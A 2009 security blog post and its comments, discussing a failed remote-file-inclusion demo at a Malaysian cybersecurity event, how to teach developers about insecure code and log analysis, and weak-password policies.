Analyst Journal @ 01 Jun 2009 05:25 pm by ayoi
http://www.dailystrength.org/people/110944/photos-videos/item/293887
As usual, Monday is a very bad day for me. Dun ask me why but perhaps I’m watching /reading too much Garfield and influenced by this fat lazy but adorable cat obsession on hating Mondays 
. So while doing my usual Monday activities (this of cause after reading my emails especially the ones in the inbox as I’ve filtered other emails to their respective mailing list folders, so the ones arrived in the Inbox are usually meant for me personally:)), one of my friends “buzzing” me via one of the Internet Messenger clients.
—–Snip—–
my_friend: awat hang tak mai s emalam
my_friend: hackaton
soulkipper: aku balik ktn ler
my_friend: cybercert sucks arr die nye demonstration hackin
my_friend: gile lame
my_friend: sep baik a ku duk kat *******
soulkipper: btw aku not 1337 enuff
soulkipper: hahaha
my_friend: tak bukan leet
my_friend: ade mamat tu(bukan adli maupun mahmud)
my_friend: nak tunjuk
my_friend: remote file inclusio n nue attcak
my_friend: tapi
my_friend: haha
my_friend: global variable dlm php.ini
my_friend: lupe
soulkipper: remote file inclusion
soulkipper: alaaa
my_friend: nak enable
soulkipper: tu lama punya
my_friend: so buatx2 tak jadi
my_friend: haha
——-snip———-
I do believe that my friend has really good intention on mentioning those. Perhaps in the future the presenter can show some latest trend and techniques or emphasis on the rise of client side attacks on the net. I also believe that the speakers or presenters had gone through their presentation materials and the live demo steps and methods. Maybe some unexpected condition arised during the presentation time hence the unsuccessful live demo.
If I’m not mistaken during the 2007 Technical forum at PWTC, one of the presenters who tried to show some demo on Bluetooth hacking also failed. SO this kind of thing may happened to anybody. It happens to me a lot during my training sessions especially when dealing with my VMWares..Sigh..
If it was me then;
soulkipper: kalu aku, aku tunjuk je structured threat analysis using open source tools
soulkipper: abih cite
soulkipper: takpung collecting Network based evidence using open source tools
Yeah, I will do some demo on performing structured threat analysis or collection network based evidence using open source tools like argus, tcpdump, snort, tcpflow etc..
Hmm maybe I can use this topic for my next knowledge sharing session or we called it here “kopitiam session”. Materials? I can collect the network traffics and do the demo on the virtual machine. Eh.. I forgot that currently I’m using the “borrowed” laptop. I dun think running virtual machines on this laptop is a good idea…
Ahh later
p/s: To protect the identity of my friend, I have to filter some of the communication content between us
Yeah, sometime shit happen. But from there it showed lack of preparation. But once again give some credit to cybersecurity Malaysia for their effort in organizing the event. The guy from cybersecurity Malaysia are very busy with their works, so give them some slack.
let Em all complain all they like. Since complaining is the easiest thing that people can do..
Well, hats off to the presenters though. They have guts to do those presentations. But then yeah, perhaps nervous or some unforeseen mishaps disrupt the presentation..
Demoing an exploit on an application whose configurations allow insecure mode is just NOT the way to educate people. A better example would be exploiting coding errors such as lack of input filtering. Developers have control of their codes, but most likely not configuration of web application servers.
What we need is better education of developers, not to show off what attackers can do.
Dear spoonfork,
We showed/demoed how people can abuse RFI/SQL and command injection problem to get people realize the problems, later on we show them the real problem which is the insecure CODE practices. And we ask them to spot and fix the CODE(in handsout). and later on we ask them to study the apache log to find any pattern of those attacks.
*sighh*.we didn’t bother to get people excited which demoing demm plain and old method of attacking RFI/SQL/etc..etc. Hence the training is cal as “analyzing the intrusion” instead of web hacking.*sighh*.
Dear ‘my_friend’,
Again, the whole class is to do analysis of RFI attack. seriously, what the fuss is about attacking?. and we’re just try to show the impact of the bugs.*sighh*.That’s the reason why we showing the demo. and demmit, the ctf thingy is just to get people not so sleepy (who want to learn analyzing stuff compare to breaking stuff? : ) ) ..*sighh*.
And then again, we never ever claim ourself as demm rockstar in infosec world and as always, we have our own weaknesses and learning curve.
And yes, i told everybody that RFI/SQL is freaking old and everybody know about it (RFI/SQL). But does anyone bother do any free training for analyzing and fixing the bugs to public at large?. ‘sembang kosong’ is always what we do better, dude.:)
Do u really were there from the beginning i started our presentation. if u weren’t there and still complaining abt old attack on RFI,u’r absolutely talking out of context. We keep telling ppl that this is the “BASIC and OLD attacks. Please google for more advance RFI/SQL injection stuffs”.*sigh*
Dear ayoi,
since when collecting/analyzing pcap is new stuff..heheh.just kidding dude. We just want people to be able to analyze their own code and their own web server log and spot any pattern of attacks and react to it.:).yeah, that’s all i guess. we didn’t intend to talk about breaking/hacking stuff at all.
Regards,
y0muds
n00b.
p.s:i apologize in advance if i accidentally offended someone with my comments on ayois’ blog.:). sorry.
p.s.s:sorry ayoi for long comments.hahaha
http://www.8dou.net/html/article_show_30715.shtml
lee, any translation for that web? hehe i totally lost to understand any words in the website, hehehe.
yomuds,
chill bro chill! hehe
RFI is freeking old? how about weak password?
x1337
I think weak passwords are usually concern with human error/problem. And for this layer, I believe it should be governed by security policies.
But then there’s no patch for human stupidity rite?
With regards to weak passwords:
In the enterprise: domain controllers and PAM are capable of enforcing the usage of strong passwords enterprise-wide.
Application: it’s entirely up to the developer. When was the last time maybank2u ask it’s user to change password?
Users are hard to educate, but with the right enforcement, education and the correct usage and deployment of the right technology, a lot of problem can be solved.
cool everyone… nobody is perfect in this world. everybody made a mistake. The important thing is we learn from that. And please, keep supporting others too
akram, here is the translation of the website.. google is always ur best friends..
http://translate.google.com/translate?js=n&prev=_t&hl=en&ie=UTF-8&u=http://www.8dou.net/html/article_show_30715.shtml&sl=zh-CN&tl=en&history_state0=